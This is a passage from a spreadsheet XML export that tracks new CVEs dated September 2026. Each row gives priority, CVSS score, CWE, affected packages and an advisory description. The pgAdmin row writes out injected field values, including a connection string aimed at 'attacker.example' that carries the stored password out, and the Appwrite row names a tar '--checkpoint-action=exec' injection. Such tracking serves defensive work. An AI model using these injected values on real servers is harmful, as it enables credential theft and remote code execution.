      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, RichTextDescriptionCell in packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx attempts to strip markup by assigning an administrator-controlled description to a live element's innerHTML and then reading textContent. Active resource markup can execute an event handler during the innerHTML assignment before textContent is read. A lower-privilege administrator can store such markup in descriptions rendered by the Products list, Collections list, Promotions list, Payment Methods list, or Shipping Methods list, and script executes when another administrator views the affected row. This stored cross-site scripting can compromise the viewing administrator's session and enable cross-privilege or cross-channel administrative actions. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63459</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69197</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>nuget:Umbraco.Cms</t>
        </is>
      </c>
      <c r="M93" s="5" t="inlineStr">
        <is>
          <t>13.15.1, 17.5.3, 18.0.2</t>
        </is>
      </c>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>Umbraco is an ASP.NET CMS. Prior to 13.15.1, 17.5.3, and 18.0.2, the Content Delivery API applies member and Public Access checks to the directly requested node but not to referenced nodes serialized through Content Picker or Multi-Node Tree Picker properties, including pickers nested in Block List, Block Grid, or Rich Text Editor blocks. When DeliveryApi:PublicAccess is enabled, an anonymous caller can retrieve a protected node's name, route, and id through an unprotected referencing node and use ?expand to retrieve full property values. When the Delivery API is instead gated by the organization-wide API key, a key holder can still bypass per-node Public Access through the same expansion path. The same RequestContextOutputExpansionStrategyV2 and ElementOnlyOutputExpansionStrategy path also bypasses allowed or disallowed content-type alias restrictions for referenced content. Direct requests for the protected node still return 401, and no integrity or availability impact is established. This issue is fixed in versions 13.15.1, 17.5.3, and 18.0.2.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69197</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77615</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Paella Player is a set of libraries to create a multi stream video player. Prior to Paulla Player 2.12.11 (as used in Opencast prior to 19.7 and 20.2), there is a potential XSS attack though closed captions cue text. This vulnerability is fixed in 2.12.11.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77615</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86864</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-88</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/&lt;sid&gt;/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further.
The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection carries that credential to the attacker-nominated endpoint. Both behaviours are reachable by any authenticated user holding the tools_backup permission, which is granted to the default User role.
The fix stops passing the database name through the argument vector altogether and supplies it in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. This matches the approach already used by the Import/Export tool. Regression tests assert that the database name is absent from the constructed argument vector and that PGDATABASE carries the exact requested value.
This issue affects pgAdmin 4: from the introduction of the trailing positional database argument in the Backup tool before 9.18.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86864</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89036</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Appwrite before 2.0.0 contains an argument injection vulnerability that allows authenticated users with functions.write or sites.write permissions to execute arbitrary commands by injecting TAB characters into the providerRootDirectory parameter used to construct GNU tar commands. The application uses escapeshellcmd instead of escapeshellarg and fails to quote the parameter, allowing TAB characters to survive sanitization and be interpreted as argument separators, enabling injection of arbitrary GNU tar arguments such as --checkpoint-action=exec to achieve remote code execution as the builds worker process user.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89036</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89418</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>google-protobuf contains an unbounded recursion when parsing unknown protobuf group fields. An attacker can send a small crafted payload of deeply nested START_GROUP wire bytes to any Node.js service that calls the generated deserializeBinary() API, causing a RangeError: Maximum call stack size exceeded and crashing the process. No authentication or prior knowledge of the schema is required.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89418</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92971</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>InternLM LMDeploy through 0.17.0 contains a reachable assertion vulnerability in the DistServe decode migration loop that allows unauthenticated attackers to terminate the inference engine. Attackers can submit a migration_request with an empty remote_block_ids list to trigger an AssertionError that crashes the engine loop and causes subsequent inference requests to fail.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92971</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92987</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>roxmltree through 0.21.1 performs quadratic-time attribute and namespace validation during XML parsing without limits on attribute count. Attackers can craft XML documents with tens of thousands of attributes on a single element to consume excessive CPU time and cause denial of service.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92987</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19477</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>There
is stack-based buffer overflow vulnerability recently discovered in MCC Universal Library for Linux (uldaq).  This may result in information disclosure or arbitrary code
execution. This vulnerability affects MCC Universal Library for Linux (uldaq) v1.2.1
and prior versions.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19477</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68791</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Azure Machine Learning allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68791</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87963</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr"/>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>The Yo WordPress plugin from 1.1 through 1.3.1 does not sanitize or parameterize the username request parameter before using it in a SQL query, and reads it before WordPress applies its request escaping, allowing unauthenticated attackers to perform SQL injection and read arbitrary database contents including administrator password hashes.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87963</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92914</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>AVideo LoginControl contains an authentication bypass vulnerability in the PGP second factor verification that compares challenge responses using loose equality against an uninitialized session variable. Attackers with a victim's password can bypass the second factor by sending a parameter-less GET request to verifyChallenge.json.php, which evaluates null == null and marks authentication complete.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92914</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92954</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox library for running untrusted JavaScript in Node.js. In versions &gt;= 3.10.0 and &lt;= 3.11.7, Promises returned from the host realm into the sandbox are not marked as handled at the bridge boundary; only Promises created inside the sandbox are wrapped with a rejection-swallowing handler (lib/setup-sandbox.js), and the bridge only installs host-side rejection sanitizers when sandbox code calls .then/.catch/.finally. As a result, code running in the sandbox can invoke a host function that returns a rejected Promise (for example events.once() exposed via the NodeVM events builtin, or any embedder-provided Promise-returning API) and simply ignore the return value, leaving the host Promise unhandled so that Node.js's default unhandled-rejection behavior terminates the host process. This is an incomplete fix of GHSA-hw58-p9xv-2mjh. The issue is fixed in version 3.11.8.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92954</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92985</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before 3.8.4 fail to escape bookmark labels imported from notebook files when rendering them in the dock tree. Attackers can craft malicious .sy notebook files with unescaped HTML in bookmark attributes that execute scripts in the Electron renderer with access to child_process for command execution.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92985</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92986</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.4 renders document titles as HTML in the backlink dock tree without escaping markup characters. Attackers can set malicious titles through the rename API or crafted notebooks to execute scripts in the Electron renderer with access to child_process for command execution.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92986</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66580</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Product Feed Manager &lt;= 7.12.0 versions.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66580</t>
        </is>
      </c>
